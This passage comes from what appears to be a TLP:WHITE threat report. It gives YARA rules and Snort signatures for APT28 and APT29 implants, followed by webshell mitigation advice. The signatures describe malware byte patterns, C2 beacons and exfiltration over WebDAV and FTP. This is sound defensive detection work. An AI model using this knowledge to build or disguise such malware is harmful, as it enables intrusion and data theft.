$key36 = { 06E4E46BD3A0FFC8A4125A6A02B0C56D5D8B9E378CF97539CE4D4ADFAF89FEB5 }
$key37 = { 6DE22040821F0827316291331256A170E23FA76E381CA7066AF1E5197AE3CFE7 }
$key38 = { C6EF27480F2F6F40910074A45715143954BBA78CD74E92413F785BBA5B2AA121 }
$key39 = { 19C96A28F8D9698ADADD2E31F2426A46FD11D2D45F64169EDC7158389BFA59B4 }
$key40 = { C3C3DDBB9D4645772373A815B5125BB2232D8782919D206E0E79A6A973FF5D36 }
$key41 = { C33AF1608037D7A3AA7FB860911312B4409936D236564044CFE6ED42E54B78A8 }
$key42 = { 856A0806A1DFA94B5E62ABEF75BEA3B657D9888E30C8D2FFAEC042930BBA3C90 }
$key43 = { 244496C524401182A2BC72177A15CDD2EF55601F1D321ECBF2605FFD1B9B8E3F }
$key44 = { DF24050364168606D2F81E4D0DEB1FFC417F1B5EB13A2AA49A89A1B5242FF503 }
$key45 = { 54FA07B8108DBFE285DD2F92C84E8F09CDAA687FE492237F1BC4343FF4294248 }
$key46 = { 23490033D6BF165B9C45EE65947D6E6127D6E00C68038B83C8BFC2BCE905040C }
$key47 = { 4E044025C45680609B6EC52FEB3491130A711F7375AAF63D69B9F952BEFD5F0C }
$key48 = { 019F31C5F5B2269020EBC00C1F511F2AC23E9D37E89374514C6DA40A6A03176C }
$key49 = { A2483197FA57271B43E7276238468CFB8429326CBDA7BD091461147F642BEB06 }
$key50 = { 731C9D6E74C589B7ACB019E5F6A6E07ACF12E68CB9A396CE05AA4D69D5387048 }
$key51 = { 540DB6C8D23F7F7FEF9964E53F445F0E56459B10E931DEEEDB2B57B063C7F8B7 }
$key52 = { D5AF80A7EEFF26DE988AC3D7CE23E62568813551B2133F8D3E973DA15E355833 }
$key53 = { E4D8DBD3D801B1708C74485A972E7F00AFB45161C791EE05282BA68660FFBA45 }
$key54 = { D79518AF96C920223D687DD596FCD545B126A678B7947EDFBF24661F232064FB }
$key55 = { B57CAA4B45CA6E8332EB58C8E72D0D9853B3110B478FEA06B35026D7708AD225 }
$key56 = { 077C714C47DFCF79CA2742B1544F4AA8035BB34AEA9D519DEE77745E01468408 }
$key57 = { C3F5550AD424839E4CC54FA015994818F4FB62DE99B37C872AF0E52C376934FA }
$key58 = { 5E890432AE87D0FA4D209A62B9E37AAEDEDC8C779008FEBAF9E4E6304D1B2AAC }
$key59 = { A42EDE52B5AF4C02CFE76488CADE36A8BBC3204BCB1E05C402ECF450071EFCAB }
$key60 = { 4CDAFE02894A04583169E1FB4717A402DAC44DA6E2536AE53F5F35467D31F1CA }
$key61 = { 0BEFCC953AD0ED6B39CE6781E60B83C0CFD166B124D1966330CBA9ADFC9A7708 }
34 of 56
34 of 56
TLP:WHITE
TLP:WHITE
$key62 = { 8A439DC4148A2F4D5996CE3FA152FF702366224737B8AA6784531480ED8C8877 }
$key63 = { CF253BE3B06B310901FF48A351471374AD35BBE4EE654B72B860F2A6EC7B1DBB }
$key64 = { A0599F50C4D059C5CFA16821E97C9596B1517B9FB6C6116F260415127F32CE1F }
$key65 = { 8B6D704F3DC9150C6B7D2D54F9C3EAAB14654ACA2C5C3952604E65DF8133FE0C }
$key66 = { A06E5CDD3871E9A3EE17F7E8DAE193EE47DDB87339F2C599402A78C15D77CEFD }
$key67 = { E52ADA1D9BC4C089DBB771B59904A3E0E25B531B4D18B58E432D4FA0A41D9E8A }
$key68 = { 4778A7E23C686C171FDDCCB8E26F98C4CBEBDF180494A647C2F6E7661385F05B }
$key69 = { FE983D3A00A9521F871ED8698E702D595C0C7160A118A7630E8EC92114BA7C12 }
$key70 = { 52BA4C52639E71EABD49534BBA80A4168D15762E2D1D913BAB5A5DBF14D9D166 }
$key71 = { 931EB8F7BC2AE1797335C42DB56843427EB970ABD601E7825C4441701D13D7B1 }
$key72 = { 318FA8EDB989672DBE2B5A74949EB6125727BD2E28A4B084E8F1F50604CCB735 }
$key73 = { 5B5F2315E88A42A7B59C1B493AD15B92F819C021BD70A5A6619AAC6666639BC2 }
$key74 = { C2BED7AA481951FEB56C47F03EA38236BC425779B2FD1F1397CB79FE2E15C0F0 }
$key75 = { D3979B1CB0EC1A655961559704D7CDC019253ACB2259DFB92558B7536D774441 }
$key76 = { 0EDF5DBECB772424D879BBDD51899D6AAED736D0311589566D41A9DBB8ED1CC7 }
$key77 = { CC798598F0A9BCC82378A5740143DEAF1A147F4B2908A197494B7202388EC905 }
$key78 = { 074E9DF7F859BF1BD1658FD2A86D81C282000EAB09AF4252FAB45433421D3849 }
$key79 = { 6CD540642E007F00650ED20D7B54CFFD54DDA95D8DEBB087A004BAE222F22C8E }
$key80 = { C76CF2F66C71F6D17FC8DEFA1CAEF8718BA1CE188C7EA02C835A0FA54D3B3314 }
$key81 = { A7250A149600E515C9C40FE5720756FDA8251635A3B661261070CB5DABFE7253 }
$key82 = { 237C67B97D4CCE4610DE2B82E582808EA796C34A4C24715C953CBA403B2C935E }
$key83 = { A8FA182547E66B57C497DAAA195A38C0F0FB0A3C1F7B98B4B852F5F37E885127 }
$key84 = { 83694CCA50B821144FFBBE6855F62845F1328111AE1AC5666CBA59EB43AA12C6 }
$key85 = { 145E906416B17865AD37CD022DF5481F28C930D6E3F53C50B0953BF33F4DB953 }
$key86 = { AB49B7C2FA3027A767F5AA94EAF2B312BBE3E89FD924EF89B92A7CF977354C22 }
$key87 = { 7E04E478340C209B01CA2FEBBCE3FE77C6E6169F0B0528C42FA4BDA6D90AC957 }
$key88 = { 0EADD042B9F0DDBABA0CA676EFA4EDB68A045595097E5A392217DFFC21A8532F }
$key89 = { 5623710F134ECACD5B70434A1431009E3556343ED48E77F6A557F2C7FF46F655 }
35 of 56
35 of 56
TLP:WHITE
TLP:WHITE
$key90 = { 6968657DB62F4A119F8E5CB3BF5C51F4B285328613AA7DB9016F8000B576561F }
$key91 = { DEBB9C95EAE6A68974023C335F8D2711135A98260415DF05845F053AD65B59B4 }
$key92 = { 16F54900DBF08950F2C5835153AB636605FB8C09106C0E94CB13CEA16F275685 }
$key93 = { 1C9F86F88F0F4882D5CBD32876368E7B311A84418692D652A6A4F315CC499AE8 }
$key94 = { E920E0783028FA05F4CE2D6A04BBE636D56A775CFD4DAEA3F2A1B8BEEB52A6D4 }
$key95 = { 73874CA3AF47A8A315D50E1990F44F655EC7C15B146FFE0611B6C4FC096BD07C }
$key96 = { F21C1FA163C745789C53922C47E191A5A85301BDC2FFC3D3B688CFBFF39F3BE5 }
$key97 = { BC5A861F21CB98BD1E2AE9650B7A0BB4CD0C71900B3463C1BC3380AFD2BB948E }
$key98 = { 151BAE36E646F30570DC6A7B57752F2481A0B48DD5184E914BCF411D8AD5ACA0 }
$key99 = { F05AD6D7A0CADC10A6468BFDBCBB223D5BD6CA30EE19C239E8035772D80312C9 }
$key100 = { 5DE9A0FDB37C0D59C298577E5379BCAF4F86DF3E9FA17787A4CEFA7DD10C462E }
$key101 = { F5E62BA862380224D159A324D25FD321E5B35F8554D70CF9A506767713BCA508 }
$key102 = { A2D1B10409B328DA0CCBFFDE2AD2FF10855F95DA36A1D3DBA84952BB05F8C3A7 }
$key103 = { C974ABD227D3AD339FAC11C97E11D904706EDEA610B181B8FAD473FFCC36A695 }
$key104 = { AB5167D2241406C3C0178D3F28664398D5213EE5D2C09DCC9410CB604671F5F1 }
$key105 = { C25CC4E671CAAA31E137700A9DB3A272D4E157A6A1F47235043D954BAE8A3C70 }
$key106 = { E6005757CA0189AC38F9B6D5AD584881399F28DA949A0F98D8A4E3862E20F715 }
$key107 = { 204E6CEB4FF59787EF4D5C9CA5A41DDF4445B9D8E0C970B86D543E9C7435B194 }
$key108 = { 831D7FD21316590263B69E095ABBE89E01A176E16AE799D83BD774AF0D254390 }
$key109 = { 42C36355D9BC573D72F546CDB12E6BB2CFE2933AC92C12040386B310ABF6A1ED }
$key110 = { B9044393C09AD03390160041446BF3134D864D16B25F1AB5E5CDC690C4677E7D }
$key111 = { 6BC1102B5BE05EEBF65E2C3ACA1F4E17A59B2E57FB480DE016D371DA3AEF57A5 }
$key112 = { B068D00B482FF73F8D23795743C76FE8639D405EE54D3EFB20AFD55A9E2DFF4E }
$key113 = { 95CF5ADDFE511C8C7496E3B75D52A0C0EFE01ED52D5DD04D0CA6A7ABD3A6F968 }
$key114 = { 75534574A4620019F8E3D055367016255034FA7D91CBCA9E717149441742AC8D }
$key115 = { 96F1013A5301534BE424A11A94B740E5EB3A627D052D1B769E64BAB6A666433C }
$key116 = { 584477AB45CAF729EE9844834F84683ABECAB7C4F7D23A9636F54CDD5B8F19B3 }
$key117 = { D3905F185B564149EE85CC3D093477C8FF2F8CF601C68C38BBD81517672ECA3A }
36 of 56
36 of 56
TLP:WHITE
TLP:WHITE
$key118 = { BF29521A7F94636D1930AA236422EB6351775A523DE68AF9BF9F1026CEDA618D }
$key119 = { 04B3A783470AF1613A9B849FBD6F020EE65C612343EB1C028B2C28590789E60B }
$key120 = { 3D8D8E84977FE5D21B6971D8D873E7BED048E21333FE15BE2B3D1732C7FD3D04 }
$key121 = { 8ACB88224B6EF466D7653EB0D8256EA86D50BBA14FD05F7A0E77ACD574E9D9FF }
$key122 = { B46121FFCF1565A77AA45752C9C5FB3716B6D8658737DF95AE8B6A2374432228 }
$key123 = { A4432874588D1BD2317224FB371F324DD60AB25D4191F2F01C5C13909F35B943 }
$key124 = { 78E1B7D06ED2A2A044C69B7CE6CDC9BCD77C19180D0B082A671BBA06507349C8 }
$key125 = { 540198C3D33A631801FE94E7CB5DA3A2D9BCBAE7C7C3112EDECB342F3F7DF793 }
$key126 = { 7E905652CAB96ACBB7FEB2825B55243511DF1CD8A22D0680F83AAF37B8A7CB36 }
$key127 = { 37218801DBF2CD92F07F154CD53981E6189DBFBACAC53BC200EAFAB891C5EEC8 }
condition:
any of them
Rule IMPLANT_5_v3
strings:
$BYTES1 = { 0F AF C0 6? C0 07 00 00 00 2D 01 00 00 00 0F AF ?? 39 ?8 }
$BYTES2 = { 0F AF C0 6? C0 07 48 0F AF ?? 39 ?8 }
condition:
any of them
Rule IMPLANT_5_v4
strings:
$FBKEY1 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
$FBKEY2 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
37 of 56
37 of 56
TLP:WHITE
TLP:WHITE
$FBKEY3 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
$FBKEY4 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
$FBKEY5 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
condition:
all of them
Network Indicators for Implant 5
alert tcp any any -> any [$HTTP_PORTS,44300] (msg:"X Tunnel_HTTP_CONNECT_HANDSHAKE";
flow:established,to_server; dsize:4; content:"|00 00 00|"; offset:1; depth:3; byte_test:1,<,96,0;
content:!"HTTP";)
alert tcp any any -> any 443 (msg:"X Tunnel_UPSTREAM_CONNECTION_EVENT";
flow:established,to_server; stream_size:either,=,20; content:"|02 00 00 10|"; depth:4;)
The following YARA rules detect Sofacy, Sednit, EVILTOSS, referred to as IMPLANT 6 with rule
naming convention.
IMPLANT 6 Rules:
Rule IMPLANT_6_v1
strings:
$STR1 = "dll.dll" wide ascii
$STR2 = "Init1" wide ascii
$STR3 = "netui.dll" wide ascii
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
38 of 56
38 of 56
TLP:WHITE
TLP:WHITE
Rule IMPLANT_6_v2
strings:
$obf_func = { 8B 45 F8 6A 07 03 C7 33 D2 89 45 E8 8D 47 01 5B 02 4D 0F F7 F3 6A 07 8A 04 32
33 D2 F6 E9 8A C8 8B C7 F7 F3 8A 44 3E FE 02 45 FC 02 0C 32 B2 03 F6 EA 8A D8 8D 47 FF 33 D2
5F F7 F7 02 5D 14 8B 45 E8 8B 7D F4 C0 E3 06 02 1C 32 32 CB 30 08 8B 4D 14 41 47 83 FF 09 89 4D
14 89 7D F4 72 A1 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_6_v3
strings:
$deob_func = { 8D 46 01 02 D1 83 E0 07 8A 04 38 F6 EA 8B D6 83 E2 07 0A 04 3A 33 D2 8A 54
37 FE 03 D3 03 D1 D3 EA 32 C2 8D 56 FF 83 E2 07 8A 1C 3A 8A 14 2E 32 C3 32 D0 41 88 14 2E 46
83 FE 0A 7C ?? }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_6_v4
strings:
$ASM = {53 5? 5? [6-15] ff d? 8b ?? b? a0 86 01 00 [7-13] ff d? ?b [6-10] c0 [0-1] c3}
39 of 56
39 of 56
TLP:WHITE
TLP:WHITE
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_6_v5
strings:
$STR1 = { 83 EC 18 8B 4C 24 24 B8 AB AA AA AA F7 E1 8B 44 24 20 53 55 8B EA 8D 14 08
B8 AB AA AA AA 89 54 24 1C F7 E2 56 8B F2 C1 ED 02 8B DD 57 8B 7C 24 38 89 6C 24 1C C1 EE
02 3B DE 89 5C 24 18 89 74 24 20 0F 83 CF 00 00 00 8D 14 5B 8D 44 12 FE 89 44 24 10 3B DD 0F 85
CF 00 00 00 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA 83 F9 06 89 4C 24 38 0F 83 86 00 00 00 8A C3
B2 06 F6 EA 8B 54 24 10 88 44 24 30 8B 44 24 2C 8D 71 02 03 D0 89 54 24 14 8B 54 24 10 33 C0 8A
44 37 FE 03 D6 8B D8 8D 46 FF 0F AF DA 33 D2 BD 06 00 00 00 F7 F5 C1 EB 07 8A 04 3A 33 D2 32
D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24
14 02 D9 8A 0C 30 32 CB 88 0C 30 8B 4C 24 38 41 46 83 FE 08 89 4C 24 38 72 A1 8B 5C 24 18 8B 6C
24 1C 8B 74 24 20 8B 4C 24 10 43 83 C1 06 3B DE 89 4C 24 10 8B 4C 24 34 89 5C 24 18 0F 82 3C FF
FF FF 3B DD 75 1A 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA EB 0D 33 C9 89 4C 24 38 E9 40 FF FF
FF 33 C9 8B 44 24 24 33 D2 BE 06 00 00 00 89 4C 24 38 F7 F6 3B CA 89 54 24 24 0F 83 95 00 00 00
8A C3 B2 06 F6 EA 8D 1C 5B 88 44 24 30 8B 44 24 2C 8D 71 02 D1 E3 89 5C 24 34 8D 54 03 FE 89
54 24 14 EB 04 8B 5C 24 34 33 C0 BD 06 00 00 00 8A 44 3E FE 8B D0 8D 44 1E FE 0F AF D0 C1 EA
07 89 54 24 2C 8D 46 FF 33 D2 BB 06 00 00 00 F7 F3 8B 5C 24 2C 8A 04 3A 33 D2 32 D8 8D 46 01
F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24 14 02 D9 8A
0C 06 32 CB 88 0C 06 8B 4C 24 38 8B 44 24 24 41 46 3B C8 89 4C 24 38 72 8F 5F 5E 5D 5B 83 C4 18
C2 10 00 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_6_v6
strings:
40 of 56
40 of 56
TLP:WHITE
TLP:WHITE
$Init1_fun = {68 10 27 00 00 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A FF 50 FF 15 ?? ?? ?? ?? 33 C0
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_6_v7
strings:
$STR1 = "Init1"
$OPT1 = "ServiceMain"
$OPT2 = "netids" nocase wide ascii
$OPT3 = "netui" nocase wide ascii
$OPT4 = "svchost.exe" wide ascii
$OPT5 = "network" nocase wide ascii
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and $STR1 and 2 of ($OPT*)
41 of 56
41 of 56
TLP:WHITE
TLP:WHITE
APPENDIX B: APT29
This section details six implants associated with APT29 actors. Included are YARA rules as well as
SNORT signatures. Please note that despite being sound production rules, there is still the chance for
False Positives. In addition, these will complement additional analysis and should not be used as the sole
source of attribution.
The following YARA rules detect IMPLANT 7, with rule naming convention.
IMPLANT 7 Rules:
Rule IMPLANT_7_v1
strings:
$MZ = "MZ"
$STR1 = { 8A 44 0A 03 32 C3 0F B6 C0 66 89 04 4E 41 3B CF 72 EE }
$STR2 = { F3 0F 6F 04 08 66 0F EF C1 F3 0F 7F 04 11 83 C1 10 3B CF 72 EB }
condition:
$MZ at 0 and ($STR1 or $STR2)
Network Indicators for Implant 7
alert tcp any any -> any 80 (content:".php?";
pcre:"/\/(?:index|status|captha|json|css|ajax|js)\.php\?(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|
im|code|search)=[a-z09]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26} HTTP/";
msg:"Cache_DLL beacon GET 2 arg"; sid:1234;)
alert tcp any any -> any 80 (content:".php?";
pcre:"/\/(?:index|status|captha|json|css|ajax|js)\.php\?(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|
im|code|search)=[a-z0-
42 of 56
42 of 56
TLP:WHITE
TLP:WHITE
9]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z09]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26} HTTP/";
msg:"Cache_DLL beacon GET 3 arg"; sid:1234;)
alert tcp any any -> any 80 (content:".php?";
pcre:"/\/(?:index|status|captha|json|css|ajax|js)\.php\?(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|
im|code|search)=[a-z09]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z09]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z09]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26} HTTP/";
msg:"Cache_DLL beacon GET 4 arg"; sid:1234;)
The following YARA rules detect HAMMERTOSS / HammerDuke, referred to as IMPLANT 8 with rule
naming convention.
IMPLANT 8 Rules:
rule IMPLANT_8_v1
strings:
$DOTNET = "mscorlib" ascii
$REF_URL = "https://www.google.com/url?sa=" wide
$REF_var_1 = "&rct=" wide
$REF_var_2 = "&q=&esrc=" wide
$REF_var_3 = "&source=" wide
$REF_var_4 = "&cd=" wide
$REF_var_5 = "&ved=" wide
$REF_var_6 = "&url=" wide
$REF_var_7 = "&ei=" wide
$REF_var_8 = "&usg=" wide
43 of 56
43 of 56
TLP:WHITE
TLP:WHITE
$REF_var_9 = "&bvm=" wide
$REF_value_1 = "QFj" wide
$REF_value_2 = "bv.81" wide
condition:
(uint16(0) == 0x5A4D) and ($DOTNET) and ($REF_URL) and (3 of ($REF_var*)) and (1 of
($REF_value*))
Rule IMPLANT_8_v2
strings:
$DOTNET= "mscorlib" ascii
$XOR = {61 20 AA 00 00 00 61}
condition:
(uint16(0) == 0x5A4D) and all of them
Network Indicator for Implant 8
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MAL_REFERER";
flow:established,to_server; content:"GET"; http_method; content:"&bvm=bv.81"; fast_pattern;
http_header; content:",d."; distance:6; within:3; http_header; content:"|0D 0A|"; distance:3;within:2;
http_header; content:!"Cookie|3A 20|"; http_header;
pcre:"/https:\/\/www\.google\.com\/url\?sa=t&rct=j&q=&esrc=s&source=web&cd=(?:[09]|10|11)&ved=0C[A-L]{2}QFjA[A-L]&url=[^&]{1,512}&ei=[A-Za-z0-9]{20,22}&usg=[A-Za-z09_]{34}&bvm=bv\.81[1-7]{6}\,d\.[A-Za-z0-9_]{3}\x0d\x0a/D";sid:1234;rev:2;)
alert tcp any any -> any any (msg: "evil_twitter_callback"; content:"GET /api/asyncTwitter.php
HTTP/1.1";)
44 of 56
44 of 56
TLP:WHITE
TLP:WHITE
The following YARA rules detect OnionDuke, referred to as IMPLANT 9 with rule naming convention.
IMPLANT 9 Rules:
Rule IMPLANT_9_v1
strings:
$STR1 = { 8B 03 8A 54 01 03 32 55 FF 41 88 54 39 FF 3B CE 72 EE }
$STR2 = { 8B C8 83 E1 03 8A 54 19 08 8B 4D 08 32 54 01 04 40 88 54 38 FF 3B C6 72 E7 }
$STR3 = { 8B 55 F8 8B C8 83 E1 03 8A 4C 11 08 8B 55 FC 32 0C 10 8B 17 88 4C 02 04 40 3B 06
72 E3 }
condition:
(uint16(0) == 0x5A4D or uint16(0)) and all of them
The following Yara rule detects CozyDuke, CozyCar, CozyBear, referred to as IMPLANT 10 with rule
naming convention.
IMPLANT 10 Rules:
Rule IMPLANT_10_v1
strings:
$MZ = "MZ"
$STR1 = {33 ?? 83 F2 ?? 81 e2 ff 00 00 00}
$STR2 = {0f be 14 01 33 d0 ?? f2 [1-4] 81 e2 ff 00 00 00 66 89 [6] 40 83 f8 ?? 72}
condition:
45 of 56
45 of 56
TLP:WHITE
TLP:WHITE
$MZ at 0 and ($STR1 or $STR2)
Rule IMPLANT_10_v2
strings:
$MZ = "MZ"
$xor = { 34 ?? 66 33 C1 48 FF C1 }
$nop = { 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00}
condition:
$MZ at 0 and $xor and $nop
Network Indicators for IMPLANT 10
alert tcp any any -> any 80 (content:"=650&";
pcre:"/=11&[^&]{1,7}?=2[^&]{6,12}&[^&]{1,7}?=410&[^&]{1,7}?=650&[^&]{1,7}?=51
HTTP\/1\.1/"; msg:"CozyCar"; sid:1;)
alert tcp any any -> any 80 (content:".php? HTTP"; content:"=12&"; distance:0;
pcre:"/=12&[^&=]{1,7}?=2[^&=]{12,16}?==[^&=]{18,26}?==/"; msg:"CozyCarv2"; sid:1234;)
The following YARA rules detect MiniDuke, referred to as IMPLANT 11 with rule naming convention.
IMPLANT 11 Rules:
Rule IMPLANT_11_v1
46 of 56
46 of 56
TLP:WHITE
TLP:WHITE
strings:
$STR1 = {63 74 00 00} // ct
$STR2 = {72 6F 74 65} // rote
$STR3 = {75 61 6C 50} // triV
$STR4 = {56 69 72 74} // Plau
$STR5 = { e8 00 00 00 00 }
$STR6 = { 64 FF 35 00 00 00 00 }
$STR7 = {D2 C0}
$STR8 =
/\x63\x74\x00\x00.{3,20}\x72\x6F\x74\x65.{3,20}\x75\x61\x6C\x50.{3,20}\x56\x69\x72\x74/
condition:
(uint16(0) == 0x5A4D) and #STR5 > 4 and all of them
Network Indicators for IMPLANT 11
alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_1_1 - new"; content:"IUgyYll";
pcre:"/IUgyYll(\x0d\x0a)??t(\x0d\x0a)??L(\x0d\x0a)??l(\x0d\x0a)??N(\x0d\x0a)??3(\x0d\x0a)??Q/";)
alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_1_2 - new"; content:"ltLlN3Q";
pcre:"/I(\x0d\x0a)??U(\x0d\x0a)??g(\x0d\x0a)??y(\x0d\x0a)??Y(\x0d\x0a)??l(\x0d\x0a)??ltLlN3Q/";)
alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_2_1 - new"; content:"FIMmJZ";
pcre:"/FIMmJZ(\x0d\x0a)??b(\x0d\x0a)??S(\x0d\x0a)??5(\x0d\x0a)??T(\x0d\x0a)??d(\x0d\x0a)??0/";)
alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_2_2 - new"; content:"bS5Td0";
pcre:"/F(\x0d\x0a)??I(\x0d\x0a)??M(\x0d\x0a)??m(\x0d\x0a)??J(\x0d\x0a)??Z(\x0d\x0a)??bS5Td0/";)
alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_3_1 - new"; content:"hSDJiWW";
pcre:"/hSDJiWW(\x0d\x0a)??0(\x0d\x0a)??u(\x0d\x0a)??U(\x0d\x0a)??3(\x0d\x0a)??d(\x0d\x0a)??A/";)
47 of 56
47 of 56
TLP:WHITE
TLP:WHITE
alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_3_2 - new"; content:"W0uU3dA";
pcre:"/h(\x0d\x0a)??S(\x0d\x0a)??D(\x0d\x0a)??J(\x0d\x0a)??i(\x0d\x0a)??W(\x0d\x0a)??W0uU3dA/";)
alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_1_1 - new"; content:"QDM0Zlo";
pcre:"/QDM0Zlo(\x0d\x0a)??3(\x0d\x0a)??R(\x0d\x0a)??V(\x0d\x0a)??t(\x0d\x0a)??w(\x0d\x0a)??X/";)
alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_1_2 - new"; content:"o3RVtwX";
pcre:"/Q(\x0d\x0a)??D(\x0d\x0a)??M(\x0d\x0a)??0(\x0d\x0a)??Z(\x0d\x0a)??l(\x0d\x0a)??o3RVtwX/";)
alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_2_1 - new"; content:"AzNGZa";
pcre:"/AzNGZa(\x0d\x0a)??N(\x0d\x0a)??0(\x0d\x0a)??V(\x0d\x0a)??b(\x0d\x0a)??c(\x0d\x0a)??F/";)
alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_2_2 - new"; content:"N0VbcF";
pcre:"/A(\x0d\x0a)??z(\x0d\x0a)??N(\x0d\x0a)??G(\x0d\x0a)??Z(\x0d\x0a)??a(\x0d\x0a)??N0VbcF/";)
alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_3_1 - new"; content:"AMzRmWj";
pcre:"/AMzRmWj(\x0d\x0a)??d(\x0d\x0a)??F(\x0d\x0a)??W(\x0d\x0a)??3(\x0d\x0a)??B(\x0d\x0a)??c/";
alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_3_2 - new"; content:"jdFW3Bc";
pcre:"/A(\x0d\x0a)??M(\x0d\x0a)??z(\x0d\x0a)??R(\x0d\x0a)??m(\x0d\x0a)??W(\x0d\x0a)??jdFW3Bc/";
The following YARA rules detect CosmicDuke, referred to as IMPLANT 12 with rule naming
convention.
IMPLANT 12 Rules:
Rule IMPLANT_12_v1
48 of 56
48 of 56
TLP:WHITE
TLP:WHITE
strings:
$FUNC = {a1 [3-5] 33 c5 89 [2-3] 56 57 83 [4-6] 64}
condition:
(uint16(0) == 0x5A4D) and $FUNC
Network Indicators for IMPLANT 12
alert tcp any any -> any 80 (msg:"CosmicDuke HTTP Beacon"; content:"&BranchID=";
pcre:"/\?(?:m|mgn)\&Auth\=[a-zA-Z0-9]{8}\&Session\=/"; )
alert tcp any any -> any 80 (msg:"CosmicDuke Webdav Exfil"; content:"PUT /catalog/outgoing/wd";
pcre:"/PUT \/catalog\/outgoing\/wd[a-zA-Z0-9]{44}\.bin/";)
alert tcp any any -> any 21 (msg:"CosmicDuke FTP Exfil"; content:"STOR fp"; pcre:"/STOR fp[a-zAZ0-9]{44}\.bin/"; )
49 of 56
49 of 56
TLP:WHITE
TLP:WHITE
APPENDIX C: Mitigations Guidance
Defending Against Webshell Attacks
Defend
Continually patch all webservers and all web components servicing the site, including PHP,
Apache, IIS, and ColdFusion. Deploying a webshell typically requires adding to, or
modifying, the code presented by the web server and is often accomplished via an exploit of
a web server vulnerability. Patching all components that service the web server provides a
substantial mitigation against most commonly known vulnerabilities.
Adhere to least privilege principles for server access and management. Through following
the principle of least privilege, lateral movement and privilege escalation is made more
challenging to an attacker by restricting access on the box and across the network.
Restrict write access to all folders that contain files served by the web server. All content
served by the web server should be tightly controlled in such a way that only web
administrator accounts can modify or add content. This would force an attacker to gain
specific sets of credentials before they could add any malicious content to be delivered by the
server.
Restrict access to all ports and administrative panels. Server ports are typically very
predictable, and access to those ports should be constrained to only the services and users
that require them. This will reduce the attack surface on the web server and supporting
applications.
Deploy and configure Security-Enhanced Linux (SELinux) on supported Linux specific
systems. SELinux has the capability to lock down web services such as Apache and can be
configured to allow the service to access only certain directories. The administrators could
possibly include /var/www/html, which contains the actual pages being served up. If a site
has upload capabilities, then SELinux could help with least privilege by restricting read/write
access on these folders as well. The web service already runs in a lower privilege context, but
SELinux would also limit the file locations that it can actually access. This would prevent
arbitrary file writes and possible malware uploads to areas that an admin would not normally
detect.
Conduct regular vulnerability scans and establish a remediation strategy focusing on the most
detrimental findings first. Regular scanning and remediation measures will remove
opportunities to exploit known attack vectors by an adversary.
Deploy a Web Application Firewall (WAF). WAF technologies defend against common web
exploitation techniques such as SQL injection and cross site scripting. Deploying this
capability helps reduce the likelihood of a successful web attack on the server that could
otherwise allow the perpetrator to modify code and deploy the webshell.
50 of 56
50 of 56
